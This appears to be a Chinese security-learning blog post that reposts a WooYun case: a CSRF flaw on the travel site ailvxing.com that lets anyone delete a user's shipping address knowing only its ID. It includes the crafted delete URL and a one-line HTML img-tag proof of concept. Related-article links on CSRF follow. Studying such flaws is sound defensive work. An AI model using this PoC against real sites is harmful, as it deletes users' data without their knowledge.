【漏洞学习——CSRF】爱旅行网csrf删除收货地址

最新推荐文章于 2022-11-23 19:34:28 发布

原创最新推荐文章于 2022-11-23 19:34:28 发布 · 306 阅读

0 ·

CC 4.0 BY-SA版权

【渗透测试实战】同时被 2 个专栏收录

160 篇文章

订阅专栏

乌云漏洞案例学习

75 篇文章

订阅专栏

本文详细介绍了在某网站中发现的CSRF漏洞，该漏洞允许攻击者仅通过目标用户的地址ID构造URL，即可删除用户的收货地址。文章展示了如何利用此漏洞进行攻击，并提供了POC示例。

漏洞细节

在测试网站时发现删除收获地址时,只采用ID进行认证，也就是说只要知道对方的地址ID，便可构造poc进行CSRF，于是注册了两个号来测试：
帐号1：

帐号2：

构造url:

http://www.ailvxing.com//e/ShopSys/doaction.php?enews=DelAddress&addressid=1592

让账号1来访问：

可以看到已经成功删除。
可构造POC:

<html>
<img src="http://www.ailvxing.com//e/ShopSys/doaction.php？enews=DelAddress&addressid=1592">
</html>

参见：https://bugs.shuimugan.com/bug/view?bug_no=164890

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

FLy_鹏程万里

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

WEB漏洞——CSRF

qq_63594215的博客

04-11

1176

这次我来讲讲web漏洞的CSRF笔记总结，主要通过原理、类型、示例以及防御的角度展开说明，希望读者受益。CSRF（Cross-site request forgery）跨站请求伪造，也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF，是一种对网站的恶意利用。CSRF是通过伪装用户的请求来利用网站，利用网站漏洞从用户那里盗取信息说白了，就是攻击者盗用了你的身份，以你的名义发送恶意请求。

CSRF(跨站请求伪造)

热门推荐

谢公子的博客

09-23

2万+

目录 CSRF分类 GET型： POST型： CSRF攻击原理及过程： CSRF攻击实例： CSRF攻击的防御：（1）验证 HTTP Referer 字段（2）在请求地址中添加 token 并验证(Anti-CSRFtoken) （3）在 HTTP 头中自定义属性并验证 CSRF漏洞的挖掘使用BurpSuite快速生成C...

参与评论您还未登录，请先登录后发表或查看评论

CSRF一般只测试有修改、删除、添加的地方

chexili2276的博客

10-11

366

CSRF一般只测试有修改、删除、添加的地方 CSRF一般只测试有修改、删除、添加的地方所以一般成功的提示都是：操作成功、OK、000之类的转载于:https...

通过csrf进行地址修改

weixin_44720762的博客

06-01

415

打开web漏洞练习平台以一个被攻击者的身份登录个人信息页面：假设此时用户进行了信息修改。修改了地址信息（同时打开bp抓取提交给服务器的数据包）这里插入对html的知识点，当网站建设者在写html网页脚本时，在用户信息处会用到表单标签。表单是网页中提供给用户输入信息的区域。表单创建标签这里面的所有定义都属于表单内容。表单标签常用属性：name:表单名字method：对用户输入的信息做何种方...

电商项目收货地址模块在开发中如何解决横向越权安全问题

AE86-打破常规的博客

08-23

601

什么是横向越权/纵向越权？横向越权：横向越权指的是攻击者尝试访问与他拥有相同权限的用户的资源。纵向越权：纵向越权指的是一个低级别攻击者尝试访问高级别用户的资源。如何防止横向越权漏洞？可通过建立用户和可操作资源的绑定关系，用户对任何资源进行操作时，通过该绑定关系确保该资源是属于该用户所有的。对请求中的关键参数进行间接映射，避免使用原始关键参数名，比如使用索引1代替id值1...

CSRF漏洞

weixin_39861994的博客

10-29

1万+

一、CSRF漏洞介绍： CSRF是指利用受害者尚未失效的身份认证信息（ cookie、会话等信息），诱骗其点击恶意链接或者访问包含攻击代码的页面，在受害人不知情的情况下以受害者的身份向服务器发送请求，从而完成非法操作（如转账、改密、信息修改等操作）。 CSRF与XSS最大的区别就在于，CSRF并没有盗取cookie而是直接利用二、CSRF类型： get请求型CSRF 只需要构造URL，然后诱导受害者访问利用。 POST请求型CSRF 构造自动提交的...

【漏洞学习——CSRF】淘宝网CSRF添加收货地址

Fly_鹏程万里

02-22

1366

漏洞细节漏洞URL:http://member1.taobao.com/member/fresh/deliver_address.htm 收获地址细节：表单信息内容 <html> <body> <form action="http://member1.taobao.com/member/fresh/deliver_address.htm"...

生命在于学习——CSRF漏洞

易水哲的博客

08-22

227

CSRF漏洞

漏洞复现篇——CSRF漏洞的利用

爱国小白帽

02-25

1万+

CSRF漏洞原理 CSRF（Cross Site Request Forgery, 跨站请求伪造）是一种网络的攻击方式，也被称为“One Click Attack”或者Session Riding，通常缩写为CSRF或者XSRF。 CSRF漏洞是因为web应用程序在用户进行敏感操作时，如修改账号密码、添加账号、转账等，没有校验表单token或者http请求头中的referer值，从而导致恶意攻击...

pikachu靶场练习——CSRF详解

qq_42176496的博客

09-05

3204

pikachu靶场——CSRF详解

网络安全学习笔记——CSRF攻击

just do it

11-23

1367

CSRF 攻击多数情况下发起于第三方网站，少数发起于本站，如评论区等；且攻击对象必须是登陆状态；个人信息不会被窃取，而是冒用；CSRF 攻击手段多样化，可通过 URL，CORS 等发起攻击。

删除功能测试的测试点

送你一匹马

02-03

7584

1.删除时，必须有“确认删除”的提示。 2.删除交易时，需要在其他页面对删除记录做确认，审批：删除成功；或者删除被驳回。 3.删除后，查询被删数据是否还能在查询界面被查询到。 4.删除后，最好检查数据库，确认该条记录及相关的记录已经被完整删除，避免产生冗余数据。 5.删除时，系统需要判断是否有删除约束，如果有删除约束，要检查该记录是否被约束，如果被约束该记录不能被删除。例如：删除备选库...

【收货地址管理模块】——收货地址增、删、改、查、分页列表、地址详情的功能开发

lida1234567的博客

11-02

4244

帝国CMS商城功能高级使用

weixin_30918633的博客

05-12

433

一、常见问题1、为什么自定义模型加入购物车提示“非商城表的信息”？答：模型要使用商城的功能，要先到：后台>商城>商城参数设置：“指定使用商肠能的数据表”勾选你这个自定义模型表，才可以使用。2、不想显示后台的“商城”菜单，如何操作？答：后台>系统>系统参数设置>模型设置：“关闭后台菜单”项勾选“商城”即可。二、使用技巧1、商品加入购物车链接地址为： [!--n...

删除操作测试用例

wmm1287622736的博客

08-09

6263

该用例库主要针对删除操作 1.选择需要删除的数据字段。有时候系统会根据ID来删除，有时候系统会根据名称来删除，测试的时候应该多注意，一般要求按照ID来删除，因为根据名称来删除，名称可能会存在重名问题 2.应该限制重复删除。具体操作：利用网络传输以及服务器的延迟，多次单击“删除”按钮，经常在数据库中发现重复提交的数据 3.当删除的数据还有文件时，西药去验证存在数据库中的

移除 CSRF token

迷失的鱼的博客

05-08

1351

解决办法2: 移除 CSRF token也可以在指定页面移除CSRF保护:/app/Http/Middleware/VerifyCsrfToken.php<?php namespace App\Http\Middleware; use Illuminate\Foundation\Http\Middleware\VerifyCsrfToken as Middleware; class V...

从零开始学CSRF

weixin_33825683的博客

01-13

140

为什么要拿CSRF来当“攻击手法系列”的开头篇呢？因为CSRF/XSRF我个人喜爱他的程度已经超过XSS了。如果说XSS是一个老虎，那么CSRF就是隐藏在暗处的蛇。--all from freebuf 相信现在很多人不明白CSRF是怎么运作，他和XSS的不同是在哪里。我这里就逐步为大家解释，并从浅入深的介绍CSRF。入门我们先来看看CSRF和XSS的工作原理，先让大家把这两个分开来。 ...

跨站请求伪造（CSRF）那些事儿

jklove9的博客

03-05

536

1：跨站请求伪造概念（Cross-site request forgery,CSRF）攻击者会伪造一个请求（请求的形式一般为一个链接），欺骗目标用户进行点击，用户一旦点击了这个请求，整个攻击也就完成了。因此CSRF攻击也被称为“One click”攻击。攻击者利用目标用户的身份，以目标用户的名义执行某些非法操作。例如：以目标用户的名义发送邮件，发消息，盗取目标用户的账号，甚至购买商品，会泄露用户个人隐私。攻击场景举例：（1）小黑想把Lucy的收货...

【漏洞学习——SSRF】腾讯某处SSRF漏洞(非常好的利用点)附利用脚本

Fly_鹏程万里

02-22

9263

漏洞细节 ## 1. 描述本文章将概述一些经典的SSRF漏洞利用原理，从Fuzz扫描开放的服务到漏洞的自动化利用，刚好腾讯的这个漏洞点，非常适合做为案例来演示。### 1.1 漏洞信息 > 腾讯微博应用 > http://share.v.t.qq.com > SSRF利用点，参数: url > http://share.v.t.qq.com/index.php?c=s...

Laravel与Layer整合：图片上传遭遇500错误——CSRF解决

本文档主要介绍了如何在Laravel 5.5框架中集成Layer的图片上传功能，并解决由于CSRF（跨站请求伪造）验证导致的500错误。作者在项目中尝试使用Ajax进行图片上传时，由于对Laravel的深入理解不足，忽视了CSRF保护机制...